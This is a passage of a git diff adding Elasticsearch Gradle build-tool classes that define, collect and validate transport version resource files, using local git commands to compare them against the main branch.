@InputDirectory + @Optional + @PathSensitive(PathSensitivity.RELATIVE) + public Path getDefinitionsDirectory() { + return getTransportResources().get().getDefinitionsDir(); + } + + @OutputFile + public abstract RegularFileProperty getManifestFile(); + + @TaskAction + public void generateTransportVersionManifest() throws IOException { + Path definitionsDir = getDefinitionsDirectory(); + Path manifestFile = getManifestFile().get().getAsFile().toPath(); + try (var writer = Files.newBufferedWriter(manifestFile)) { + Files.walkFileTree(definitionsDir, new SimpleFileVisitor<>() { + @Override + public FileVisitResult visitFile(Path path, BasicFileAttributes attrs) throws IOException { + String subPath = definitionsDir.relativize(path).toString().replace('\\', '/'); + writer.write(subPath + "\n"); + return FileVisitResult.CONTINUE; + } + }); + } + } +} diff --git a/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/transport/TransportVersionDefinition.java b/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/transport/TransportVersionDefinition.java new file mode 100644 index 0000000000000..65f4caeb95206 --- /dev/null +++ b/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/transport/TransportVersionDefinition.java @@ -0,0 +1,35 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the "Elastic License + * 2.0", the "GNU Affero General Public License v3.0 only", and the "Server Side + * Public License v 1"; you may not use this file except in compliance with, at + * your election, the "Elastic License 2.0", the "GNU Affero General Public + * License v3.0 only", or the "Server Side Public License, v 1". + */ + +package org.elasticsearch.gradle.internal.transport; + +import java.nio.file.Path; +import java.util.ArrayList; +import java.util.List; + +record TransportVersionDefinition(String name, List ids) { + public static TransportVersionDefinition fromString(Path file, String contents) { + String filename = file.getFileName().toString(); + assert filename.endsWith(".csv"); + String name = filename.substring(0, filename.length() - 4); + List ids = new ArrayList<>(); + + if (contents.isEmpty() == false) { + for (String rawId : contents.split(",")) { + try { + ids.add(TransportVersionId.fromString(rawId)); + } catch (NumberFormatException e) { + throw new IllegalStateException("Failed to parse id " + rawId + " in " + file, e); + } + } + } + + return new TransportVersionDefinition(name, ids); + } +} diff --git a/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/transport/TransportVersionId.java b/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/transport/TransportVersionId.java new file mode 100644 index 0000000000000..407c3bd511f09 --- /dev/null +++ b/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/transport/TransportVersionId.java @@ -0,0 +1,37 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the "Elastic License + * 2.0", the "GNU Affero General Public License v3.0 only", and the "Server Side + * Public License v 1"; you may not use this file except in compliance with, at + * your election, the "Elastic License 2.0", the "GNU Affero General Public + * License v3.0 only", or the "Server Side Public License, v 1". + */ + +package org.elasticsearch.gradle.internal.transport; + +record TransportVersionId(int complete, int major, int server, int subsidiary, int patch) implements Comparable { + + static TransportVersionId fromString(String s) { + int complete = Integer.parseInt(s); + int patch = complete % 100; + int subsidiary = (complete / 100) % 10; + int server = (complete / 1000) % 1000; + int major = complete / 1000000; + return new TransportVersionId(complete, major, server, subsidiary, patch); + } + + @Override + public int compareTo(TransportVersionId o) { + // note: this is descending order so the arguments are reversed + return Integer.compare(o.complete, complete); + } + + @Override + public String toString() { + return Integer.toString(complete); + } + + public int base() { + return (complete / 1000) * 1000; + } +} diff --git a/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/transport/TransportVersionReference.java b/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/transport/TransportVersionReference.java new file mode 100644 index 0000000000000..f94f4fc6d9b6b --- /dev/null +++ b/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/transport/TransportVersionReference.java @@ -0,0 +1,61 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the "Elastic License + * 2.0", the "GNU Affero General Public License v3.0 only", and the "Server Side + * Public License v 1"; you may not use this file except in compliance with, at + * your election, the "Elastic License 2.0", the "GNU Affero General Public + * License v3.0 only", or the "Server Side Public License, v 1". + */ + +package org.elasticsearch.gradle.internal.transport; + +import org.gradle.api.attributes.Attribute; +import org.gradle.api.attributes.AttributeContainer; + +import java.io.File; +import java.io.IOException; +import java.nio.charset.StandardCharsets; +import java.nio.file.Files; +import java.nio.file.Path; +import java.util.ArrayList; +import java.util.HashSet; +import java.util.List; +import java.util.Set; + +import static org.gradle.api.artifacts.type.ArtifactTypeDefinition.ARTIFACT_TYPE_ATTRIBUTE; + +record TransportVersionReference(String name, String location) { + + private static final Attribute REFERENCES_ATTRIBUTE = Attribute.of("transport-version-references", Boolean.class); + + static List listFromFile(Path file) throws IOException { + assert file.endsWith(".csv"); + List results = new ArrayList<>(); + for (String line : Files.readAllLines(file, StandardCharsets.UTF_8)) { + String[] parts = line.split(",", 2); + if (parts.length != 2) { + throw new IOException("Invalid transport version data file [" + file + "]: " + line); + } + results.add(new TransportVersionReference(parts[0], parts[1])); + } + return results; + } + + static void addArtifactAttribute(AttributeContainer attributes) { + attributes.attribute(ARTIFACT_TYPE_ATTRIBUTE, "csv"); + attributes.attribute(REFERENCES_ATTRIBUTE, true); + } + + static Set collectNames(Iterable referencesFiles) throws IOException { + Set names = new HashSet<>(); + for (var referencesFile : referencesFiles) { + listFromFile(referencesFile.toPath()).stream().map(TransportVersionReference::name).forEach(names::add); + } + return names; + } + + @Override + public String toString() { + return name + "," + location; + } +} diff --git a/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/transport/TransportVersionReferencesPlugin.java b/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/transport/TransportVersionReferencesPlugin.java new file mode 100644 index 0000000000000..5ee561764b5a4 --- /dev/null +++ b/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/transport/TransportVersionReferencesPlugin.java @@ -0,0 +1,55 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the "Elastic License + * 2.0", the "GNU Affero General Public License v3.0 only", and the "Server Side + * Public License v 1"; you may not use this file except in compliance with, at + * your election, the "Elastic License 2.0", the "GNU Affero General Public + * License v3.0 only", or the "Server Side Public License, v 1". + */ + +package org.elasticsearch.gradle.internal.transport; + +import org.elasticsearch.gradle.internal.ProjectSubscribeServicePlugin; +import org.elasticsearch.gradle.util.GradleUtils; +import org.gradle.api.Plugin; +import org.gradle.api.Project; +import org.gradle.api.tasks.SourceSet; +import org.gradle.language.base.plugins.LifecycleBasePlugin; + +import static org.elasticsearch.gradle.internal.transport.TransportVersionResourcesPlugin.TRANSPORT_REFERENCES_TOPIC; + +public class TransportVersionReferencesPlugin implements Plugin { + + @Override + public void apply(Project project) { + project.getPluginManager().apply(LifecycleBasePlugin.class); + + project.getPlugins() + .apply(ProjectSubscribeServicePlugin.class) + .getService() + .get() + .registerProjectForTopic(TRANSPORT_REFERENCES_TOPIC, project); + + var collectTask = project.getTasks() + .register("collectTransportVersionReferences", CollectTransportVersionReferencesTask.class, t -> { + t.setGroup("Transport Versions"); + t.setDescription("Collects all TransportVersion references used throughout the project"); + SourceSet mainSourceSet = GradleUtils.getJavaSourceSets(project).findByName(SourceSet.MAIN_SOURCE_SET_NAME); + t.getClassPath().setFrom(mainSourceSet.getOutput()); + t.getOutputFile().set(project.getLayout().getBuildDirectory().file("transport-version/references.txt")); + }); + + var tvReferencesConfig = project.getConfigurations().consumable("transportVersionReferences", c -> { + c.attributes(TransportVersionReference::addArtifactAttribute); + }); + project.getArtifacts().add(tvReferencesConfig.getName(), collectTask); + + var validateTask = project.getTasks() + .register("validateTransportVersionReferences", ValidateTransportVersionReferencesTask.class, t -> { + t.setGroup("Transport Versions"); + t.setDescription("Validates that all TransportVersion references used in the project have an associated definition file"); + t.getReferencesFile().set(collectTask.get().getOutputFile()); + }); + project.getTasks().named(LifecycleBasePlugin.CHECK_TASK_NAME).configure(t -> t.dependsOn(validateTask)); + } +} diff --git a/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/transport/TransportVersionResourcesPlugin.java b/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/transport/TransportVersionResourcesPlugin.java new file mode 100644 index 0000000000000..2b1c61ecd75d4 --- /dev/null +++ b/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/transport/TransportVersionResourcesPlugin.java @@ -0,0 +1,78 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the "Elastic License + * 2.0", the "GNU Affero General Public License v3.0 only", and the "Server Side + * Public License v 1"; you may not use this file except in compliance with, at + * your election, the "Elastic License 2.0", the "GNU Affero General Public + * License v3.0 only", or the "Server Side Public License, v 1". + */ + +package org.elasticsearch.gradle.internal.transport; + +import org.elasticsearch.gradle.internal.ProjectSubscribeServicePlugin; +import org.gradle.api.Plugin; +import org.gradle.api.Project; +import org.gradle.api.file.Directory; +import org.gradle.api.plugins.JavaPlugin; +import org.gradle.api.tasks.Copy; +import org.gradle.language.base.plugins.LifecycleBasePlugin; + +import java.util.Map; + +public class TransportVersionResourcesPlugin implements Plugin { + + public static final String TRANSPORT_REFERENCES_TOPIC = "transportReferences"; + + @Override + public void apply(Project project) { + project.getPluginManager().apply(LifecycleBasePlugin.class); + var psService = project.getPlugins().apply(ProjectSubscribeServicePlugin.class).getService(); + var resourceRoot = getResourceRoot(project); + + project.getGradle() + .getSharedServices() + .registerIfAbsent("transportVersionResources", TransportVersionResourcesService.class, spec -> { + Directory transportResources = project.getLayout().getProjectDirectory().dir("src/main/resources/" + resourceRoot); + spec.getParameters().getTransportResourcesDirectory().set(transportResources); + spec.getParameters().getRootDirectory().set(project.getLayout().getSettingsDirectory().getAsFile()); + }); + + var depsHandler = project.getDependencies(); + var tvReferencesConfig = project.getConfigurations().create("globalTvReferences", c -> { + c.setCanBeConsumed(false); + c.setCanBeResolved(true); + c.attributes(TransportVersionReference::addArtifactAttribute); + c.getDependencies() + .addAllLater( + psService.flatMap(t -> t.getProjectsByTopic(TRANSPORT_REFERENCES_TOPIC)) + .map(projectPaths -> projectPaths.stream().map(path -> depsHandler.project(Map.of("path", path))).toList()) + ); + }); + + var validateTask = project.getTasks() + .register("validateTransportVersionResources", ValidateTransportVersionResourcesTask.class, t -> { + t.setGroup("Transport Versions"); + t.setDescription("Validates that all transport version resources are internally consistent with each other"); + t.getReferencesFiles().setFrom(tvReferencesConfig); + }); + project.getTasks().named(LifecycleBasePlugin.CHECK_TASK_NAME).configure(t -> t.dependsOn(validateTask)); + + var generateManifestTask = project.getTasks() + .register("generateTransportVersionManifest", GenerateTransportVersionManifestTask.class, t -> { + t.setGroup("Transport Versions"); + t.setDescription("Generate a manifest resource for all transport version definitions"); + t.getManifestFile().set(project.getLayout().getBuildDirectory().file("generated-resources/manifest.txt")); + }); + project.getTasks().named(JavaPlugin.PROCESS_RESOURCES_TASK_NAME, Copy.class).configure(t -> { + t.into("transport/definitions", c -> c.from(generateManifestTask)); + }); + } + + private static String getResourceRoot(Project project) { + var resourceRoot = project.findProperty("org.elasticsearch.transport.resourceRoot"); + if (resourceRoot == null) { + resourceRoot = "transport"; + } + return resourceRoot.toString(); + } +} diff --git a/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/transport/TransportVersionResourcesService.java b/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/transport/TransportVersionResourcesService.java new file mode 100644 index 0000000000000..239ab0c9ab493 --- /dev/null +++ b/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/transport/TransportVersionResourcesService.java @@ -0,0 +1,254 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the "Elastic License + * 2.0", the "GNU Affero General Public License v3.0 only", and the "Server Side + * Public License v 1"; you may not use this file except in compliance with, at + * your election, the "Elastic License 2.0", the "GNU Affero General Public + * License v3.0 only", or the "Server Side Public License, v 1". + */ + +package org.elasticsearch.gradle.internal.transport; + +import org.gradle.api.file.DirectoryProperty; +import org.gradle.api.services.BuildService; +import org.gradle.api.services.BuildServiceParameters; +import org.gradle.process.ExecOperations; +import org.gradle.process.ExecResult; + +import java.io.ByteArrayOutputStream; +import java.io.IOException; +import java.nio.charset.StandardCharsets; +import java.nio.file.Files; +import java.nio.file.Path; +import java.util.ArrayList; +import java.util.Collections; +import java.util.HashMap; +import java.util.HashSet; +import java.util.List; +import java.util.Map; +import java.util.Set; +import java.util.concurrent.atomic.AtomicReference; +import java.util.function.BiFunction; + +import javax.inject.Inject; + +/** + * An encapsulation of operations on transport version resources. + * + *

These are resource files to describe transport versions that will be loaded at Elasticsearch runtime. They exist + * as jar resource files at runtime, and as a directory of resources at build time. + * + *

The layout of the transport version resources are as follows: + *

    + *
  • /transport/definitions/referable/ + * - Definitions that can be looked up by name. The name is the filename before the .csv suffix.
  • + *
  • /transport/definitions/unreferable/ + * - Definitions which contain ids that are known at runtime, but cannot be looked up by name.
  • + *
  • /transport/upper_bounds/ + * - The maximum transport version definition that will be loaded for each release branch.
  • + *
+ */ +public abstract class TransportVersionResourcesService implements BuildService { + + public interface Parameters extends BuildServiceParameters { + DirectoryProperty getTransportResourcesDirectory(); + + DirectoryProperty getRootDirectory(); + } + + @Inject + public abstract ExecOperations getExecOperations(); + + private static final Path DEFINITIONS_DIR = Path.of("definitions"); + private static final Path REFERABLE_DIR = DEFINITIONS_DIR.resolve("referable"); + private static final Path UNREFERABLE_DIR = DEFINITIONS_DIR.resolve("unreferable"); + private static final Path UPPER_BOUNDS_DIR = Path.of("upper_bounds"); + + private final Path transportResourcesDir; + private final Path rootDir; + private final AtomicReference> mainResources = new AtomicReference<>(null); + private final AtomicReference> changedResources = new AtomicReference<>(null); + + @Inject + public TransportVersionResourcesService(Parameters params) { + this.transportResourcesDir = params.getTransportResourcesDirectory().get().getAsFile().toPath(); + this.rootDir = params.getRootDirectory().get().getAsFile().toPath(); + } + + /** + * Return the directory for this repository which contains transport version resources. + * This should be an input to any tasks reading resources from this service. + */ + Path getTransportResourcesDir() { + return transportResourcesDir; + } + + /** + * Return the transport version definitions directory for this repository. + * This should be an input to any tasks that only read definitions from this service. + */ + Path getDefinitionsDir() { + return transportResourcesDir.resolve(DEFINITIONS_DIR); + } + + // return the path, relative to the resources dir, of a referable definition + private Path getReferableDefinitionRelativePath(String name) { + return REFERABLE_DIR.resolve(name + ".csv"); + } + + /** Return all referable definitions, mapped by their name. */ + Map getReferableDefinitions() throws IOException { + return readDefinitions(transportResourcesDir.resolve(REFERABLE_DIR)); + } + + /** Get a referable definition from main if it exists there, or null otherwise */ + TransportVersionDefinition getReferableDefinitionFromMain(String name) { + Path resourcePath = getReferableDefinitionRelativePath(name); + return getMainFile(resourcePath, TransportVersionDefinition::fromString); + } + + /** Test whether the given referable definition exists */ + boolean referableDefinitionExists(String name) { + return Files.exists(transportResourcesDir.resolve(getReferableDefinitionRelativePath(name))); + } + + /** Return the path within the repository of the given named definition */ + Path getReferableDefinitionRepositoryPath(TransportVersionDefinition definition) { + return rootDir.relativize(transportResourcesDir.resolve(getReferableDefinitionRelativePath(definition.name()))); + } + + // return the path, relative to the resources dir, of an unreferable definition + private Path getUnreferableDefinitionRelativePath(String name) { + return UNREFERABLE_DIR.resolve(name + ".csv"); + } + + /** Return all unreferable definitions, mapped by their name. */ + Map getUnreferableDefinitions() throws IOException { + return readDefinitions(transportResourcesDir.resolve(UNREFERABLE_DIR)); + } + + /** Get a referable definition from main if it exists there, or null otherwise */ + TransportVersionDefinition getUnreferableDefinitionFromMain(String name) { + Path resourcePath = getUnreferableDefinitionRelativePath(name); + return getMainFile(resourcePath, TransportVersionDefinition::fromString); + } + + /** Return the path within the repository of the given referable definition */ + Path getUnreferableDefinitionRepositoryPath(TransportVersionDefinition definition) { + return rootDir.relativize(transportResourcesDir.resolve(getUnreferableDefinitionRelativePath(definition.name()))); + } + + /** Read all upper bound files and return them mapped by their release branch */ + Map getUpperBounds() throws IOException { + Map upperBounds = new HashMap<>(); + try (var stream = Files.list(transportResourcesDir.resolve(UPPER_BOUNDS_DIR))) { + for (var latestFile : stream.toList()) { + String contents = Files.readString(latestFile, StandardCharsets.UTF_8).strip(); + var upperBound = TransportVersionUpperBound.fromString(latestFile, contents); + upperBounds.put(upperBound.branch(), upperBound); + } + } + return upperBounds; + } + + /** Retrieve the latest transport version for the given release branch on main */ + TransportVersionUpperBound getUpperBoundFromMain(String releaseBranch) { + Path resourcePath = getUpperBoundRelativePath(releaseBranch); + return getMainFile(resourcePath, TransportVersionUpperBound::fromString); + } + + /** Return the path within the repository of the given latest */ + Path getUpperBoundRepositoryPath(TransportVersionUpperBound latest) { + return rootDir.relativize(transportResourcesDir.resolve(getUpperBoundRelativePath(latest.branch()))); + } + + private Path getUpperBoundRelativePath(String releaseBranch) { + return UPPER_BOUNDS_DIR.resolve(releaseBranch + ".csv"); + } + + // Return the transport version resources paths that exist in main + private Set getMainResources() { + if (mainResources.get() == null) { + synchronized (mainResources) { + String output = gitCommand("ls-tree", "--name-only", "-r", "main", "."); + + HashSet resources = new HashSet<>(); + Collections.addAll(resources, output.split("\n")); // git always outputs LF + mainResources.set(resources); + } + } + return mainResources.get(); + } + + // Return the transport version resources paths that have been changed relative to main + private Set getChangedResources() { + if (changedResources.get() == null) { + synchronized (changedResources) { + String output = gitCommand("diff", "--name-only", "main", "."); + + HashSet resources = new HashSet<>(); + Collections.addAll(resources, output.split("\n")); // git always outputs LF + changedResources.set(resources); + } + } + return changedResources.get(); + } + + // Read a transport version resource from the main branch, or return null if it doesn't exist on main + private T getMainFile(Path resourcePath, BiFunction parser) { + String pathString = resourcePath.toString().replace('\\', '/'); // normalize to forward slash that git uses + if (getMainResources().contains(pathString) == false) { + return null; + } + + String content = gitCommand("show", "main:./" + pathString).strip(); + return parser.apply(resourcePath, content); + } + + private static Map readDefinitions(Path dir) throws IOException { + if (Files.isDirectory(dir) == false) { + return Map.of(); + } + Map definitions = new HashMap<>(); + try (var definitionsStream = Files.list(dir)) { + for (var definitionFile : definitionsStream.toList()) { + String contents = Files.readString(definitionFile, StandardCharsets.UTF_8).strip(); + var definition = TransportVersionDefinition.fromString(definitionFile, contents); + definitions.put(definition.name(), definition); + } + } + return definitions; + } + + // run a git command, relative to the transport version resources directory + private String gitCommand(String... args) { + ByteArrayOutputStream stdout = new ByteArrayOutputStream(); + + List command = new ArrayList<>(); + Collections.addAll(command, "git", "-C", getTransportResourcesDir().toString()); + Collections.addAll(command, args); + + ExecResult result = getExecOperations().exec(spec -> { + spec.setCommandLine(command); + spec.setStandardOutput(stdout); + spec.setErrorOutput(stdout); + spec.setIgnoreExitValue(true); + }); + + if (result.getExitValue() != 0) { + throw new RuntimeException( + "git command failed with exit code " + + result.getExitValue() + + System.lineSeparator() + + "command: " + + String.join(" ", command) + + System.lineSeparator() + + "output:" + + System.lineSeparator() + + stdout.toString(StandardCharsets.UTF_8) + ); + } + + return stdout.toString(StandardCharsets.UTF_8); + } +} diff --git a/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/transport/TransportVersionUpperBound.java b/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/transport/TransportVersionUpperBound.java new file mode 100644 index 0000000000000..104a51ab79f70 --- /dev/null +++ b/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/transport/TransportVersionUpperBound.java @@ -0,0 +1,32 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the "Elastic License + * 2.0", the "GNU Affero General Public License v3.0 only", and the "Server Side + * Public License v 1"; you may not use this file except in compliance with, at + * your election, the "Elastic License 2.0", the "GNU Affero General Public + * License v3.0 only", or the "Server Side Public License, v 1". + */ + +package org.elasticsearch.gradle.internal.transport; + +import java.nio.file.Path; + +/** + * An object to represent the loaded version of a transport version upper bound. + * + * An upper bound is the maximum transport version id that should be loaded for a given release branch. + */ +record TransportVersionUpperBound(String branch, String name, TransportVersionId id) { + public static TransportVersionUpperBound fromString(Path file, String contents) { + String filename = file.getFileName().toString(); + assert filename.endsWith(".csv"); + String branch = filename.substring(0, filename.length() - 4); + + String[] parts = contents.split(","); + if (parts.length != 2) { + throw new IllegalStateException("Invalid transport version upper bound file [" + file + "]: " + contents); + } + + return new TransportVersionUpperBound(branch, parts[0], TransportVersionId.fromString(parts[1])); + } +} diff --git a/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/transport/ValidateTransportVersionReferencesTask.java b/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/transport/ValidateTransportVersionReferencesTask.java new file mode 100644 index 0000000000000..6f7319bd4bcc6 --- /dev/null +++ b/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/transport/ValidateTransportVersionReferencesTask.java @@ -0,0 +1,67 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the "Elastic License + * 2.0", the "GNU Affero General Public License v3.0 only", and the "Server Side + * Public License v 1"; you may not use this file except in compliance with, at + * your election, the "Elastic License 2.0", the "GNU Affero General Public + * License v3.0 only", or the "Server Side Public License, v 1". + */ + +package org.elasticsearch.gradle.internal.transport; + +import org.gradle.api.DefaultTask; +import org.gradle.api.file.RegularFileProperty; +import org.gradle.api.provider.Property; +import org.gradle.api.services.ServiceReference; +import org.gradle.api.tasks.CacheableTask; +import org.gradle.api.tasks.InputDirectory; +import org.gradle.api.tasks.InputFile; +import org.gradle.api.tasks.Optional; +import org.gradle.api.tasks.PathSensitive; +import org.gradle.api.tasks.PathSensitivity; +import org.gradle.api.tasks.TaskAction; +import org.gradle.api.tasks.VerificationException; +import org.gradle.api.tasks.VerificationTask; + +import java.io.IOException; +import java.nio.file.Path; + +/** + * Validates that each transport version reference has a referable definition. + */ +@CacheableTask +public abstract class ValidateTransportVersionReferencesTask extends DefaultTask implements VerificationTask { + + @ServiceReference("transportVersionResources") + abstract Property getTransportResources(); + + @InputDirectory + @Optional + @PathSensitive(PathSensitivity.RELATIVE) + public Path getDefinitionsDir() { + return getTransportResources().get().getDefinitionsDir(); + } + + @InputFile + @PathSensitive(PathSensitivity.RELATIVE) + public abstract RegularFileProperty getReferencesFile(); + + @TaskAction + public void validateTransportVersions() throws IOException { + Path namesFile = getReferencesFile().get().getAsFile().toPath(); + TransportVersionResourcesService resources = getTransportResources().get(); + + for (var tvReference : TransportVersionReference.listFromFile(namesFile)) { + if (resources.referableDefinitionExists(tvReference.name()) == false) { + throw new VerificationException( + "TransportVersion.fromName(\"" + + tvReference.name() + + "\") was used at " + + tvReference.location() + + ", but lacks a" + + " transport version definition. This can be generated with the task" // todo + ); + } + } + } +} diff --git a/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/transport/ValidateTransportVersionResourcesTask.java b/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/transport/ValidateTransportVersionResourcesTask.java new file mode 100644 index 0000000000000..4805493ee06d6 --- /dev/null +++ b/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/transport/ValidateTransportVersionResourcesTask.java @@ -0,0 +1,290 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the "Elastic License + * 2.0", the "GNU Affero General Public License v3.0 only", and the "Server Side + * Public License v 1"; you may not use this file except in compliance with, at + * your election, the "Elastic License 2.0", the "GNU Affero General Public + * License v3.0 only", or the "Server Side Public License, v 1". + */ + +package org.elasticsearch.gradle.internal.transport; + +import com.google.common.collect.Comparators; + +import org.gradle.api.DefaultTask; +import org.gradle.api.file.ConfigurableFileCollection; +import org.gradle.api.provider.Property; +import org.gradle.api.services.ServiceReference; +import org.gradle.api.tasks.CacheableTask; +import org.gradle.api.tasks.InputDirectory; +import org.gradle.api.tasks.InputFiles; +import org.gradle.api.tasks.Optional; +import org.gradle.api.tasks.PathSensitive; +import org.gradle.api.tasks.PathSensitivity; +import org.gradle.api.tasks.TaskAction; +import org.gradle.api.tasks.VerificationException; +import org.gradle.api.tasks.VerificationTask; + +import java.io.IOException; +import java.nio.file.Path; +import java.util.ArrayList; +import java.util.Collection; +import java.util.Comparator; +import java.util.HashMap; +import java.util.List; +import java.util.Map; +import java.util.Set; +import java.util.regex.Pattern; + +/** + * Validates that each defined transport version constant is referenced by at least one project. + */ +@CacheableTask +public abstract class ValidateTransportVersionResourcesTask extends DefaultTask implements VerificationTask { + + @InputDirectory + @Optional + @PathSensitive(PathSensitivity.RELATIVE) + public Path getResourcesDir() { + return getResources().get().getTransportResourcesDir(); + } + + @InputFiles + @PathSensitive(PathSensitivity.RELATIVE) + public abstract ConfigurableFileCollection getReferencesFiles(); + + private record IdAndDefinition(TransportVersionId id, TransportVersionDefinition definition) {} + + private static final Pattern NAME_FORMAT = Pattern.compile("[a-z0-9_]+"); + + @ServiceReference("transportVersionResources") + abstract Property getResources(); + + @TaskAction + public void validateTransportVersions() throws IOException { + TransportVersionResourcesService resources = getResources().get(); + Set referencedNames = TransportVersionReference.collectNames(getReferencesFiles()); + Map referableDefinitions = resources.getReferableDefinitions(); + Map unreferableDefinitions = resources.getUnreferableDefinitions(); + Map allDefinitions = collectAllDefinitions(referableDefinitions, unreferableDefinitions); + Map> idsByBase = collectIdsByBase(allDefinitions.values()); + Map upperBounds = resources.getUpperBounds(); + + for (var definition : referableDefinitions.values()) { + validateNamedDefinition(definition, referencedNames); + } + + for (var definition : unreferableDefinitions.values()) { + validateUnreferencedDefinition(definition); + } + + for (var entry : idsByBase.entrySet()) { + validateBase(entry.getKey(), entry.getValue()); + } + + for (var upperBound : upperBounds.values()) { + validateUpperBound(upperBound, allDefinitions, idsByBase); + } + + validateLargestIdIsUsed(upperBounds, allDefinitions); + } + + private Map collectAllDefinitions( + Map referableDefinitions, + Map unreferableDefinitions + ) { + Map allDefinitions = new HashMap<>(referableDefinitions); + for (var entry : unreferableDefinitions.entrySet()) { + TransportVersionDefinition existing = allDefinitions.put(entry.getKey(), entry.getValue()); + if (existing != null) { + Path unreferablePath = getResources().get().getUnreferableDefinitionRepositoryPath(entry.getValue()); + throwDefinitionFailure(existing, "has same name as unreferable definition [" + unreferablePath + "]"); + } + } + return allDefinitions; + } + + private Map> collectIdsByBase(Collection definitions) { + Map> idsByBase = new HashMap<>(); + + // first collect all ids, organized by base + for (TransportVersionDefinition definition : definitions) { + for (TransportVersionId id : definition.ids()) { + idsByBase.computeIfAbsent(id.base(), k -> new ArrayList<>()).add(new IdAndDefinition(id, definition)); + } + } + + // now sort the ids within each base so we can check density later + for (var ids : idsByBase.values()) { + // first sort the ids list so we can check compactness and quickly lookup the highest id later + ids.sort(Comparator.comparingInt(a -> a.id().complete())); + } + + return idsByBase; + } + + private void validateNamedDefinition(TransportVersionDefinition definition, Set referencedNames) { + + // validate any modifications + Map existingIdsByBase = new HashMap<>(); + TransportVersionDefinition originalDefinition = getResources().get().getReferableDefinitionFromMain(definition.name()); + if (originalDefinition != null) { + validateIdenticalPrimaryId(definition, originalDefinition); + originalDefinition.ids().forEach(id -> existingIdsByBase.put(id.base(), id)); + } + + if (referencedNames.contains(definition.name()) == false) { + throwDefinitionFailure(definition, "is not referenced"); + } + if (NAME_FORMAT.matcher(definition.name()).matches() == false) { + throwDefinitionFailure(definition, "does not have a valid name, must be lowercase alphanumeric and underscore"); + } + if (definition.ids().isEmpty()) { + throwDefinitionFailure(definition, "does not contain any ids"); + } + if (Comparators.isInOrder(definition.ids(), Comparator.naturalOrder()) == false) { + throwDefinitionFailure(definition, "does not have ordered ids"); + } + for (int ndx = 0; ndx < definition.ids().size(); ++ndx) { + TransportVersionId id = definition.ids().get(ndx); + + if (ndx == 0) { + if (id.patch() != 0) { + throwDefinitionFailure(definition, "has patch version " + id.complete() + " as primary id"); + } + } else { + if (id.patch() == 0) { + throwDefinitionFailure(definition, "contains bwc id [" + id + "] with a patch part of 0"); + } + } + + // check modifications of ids on same branch, ie sharing same base + TransportVersionId maybeModifiedId = existingIdsByBase.get(id.base()); + if (maybeModifiedId != null && maybeModifiedId.complete() != id.complete()) { + throwDefinitionFailure(definition, "modifies existing patch id from " + maybeModifiedId + " to " + id); + } + } + } + + private void validateUnreferencedDefinition(TransportVersionDefinition definition) { + TransportVersionDefinition originalDefinition = getResources().get().getUnreferableDefinitionFromMain(definition.name()); + if (originalDefinition != null) { + validateIdenticalPrimaryId(definition, originalDefinition); + } + if (definition.ids().isEmpty()) { + throwDefinitionFailure(definition, "does not contain any ids"); + } + if (definition.ids().size() > 1) { + throwDefinitionFailure(definition, " contains more than one id"); + } + // note: no name validation, anything that is a valid filename is ok, this allows eg initial_8.9.1 + } + + private void validateIdenticalPrimaryId(TransportVersionDefinition definition, TransportVersionDefinition originalDefinition) { + assert definition.name().equals(originalDefinition.name()); + + int primaryId = definition.ids().get(0).complete(); + int originalPrimaryId = originalDefinition.ids().get(0).complete(); + if (primaryId != originalPrimaryId) { + throwDefinitionFailure(definition, "has modified primary id from " + originalPrimaryId + " to " + primaryId); + } + } + + private void validateUpperBound( + TransportVersionUpperBound upperBound, + Map definitions, + Map> idsByBase + ) { + TransportVersionDefinition upperBoundDefinition = definitions.get(upperBound.name()); + if (upperBoundDefinition == null) { + throwUpperBoundFailure(upperBound, "contains transport version name [" + upperBound.name() + "] which is not defined"); + } + if (upperBoundDefinition.ids().contains(upperBound.id()) == false) { + Path relativePath = getResources().get().getReferableDefinitionRepositoryPath(upperBoundDefinition); + throwUpperBoundFailure(upperBound, "has id " + upperBound.id() + " which is not in definition [" + relativePath + "]"); + } + + List baseIds = idsByBase.get(upperBound.id().base()); + IdAndDefinition lastId = baseIds.getLast(); + if 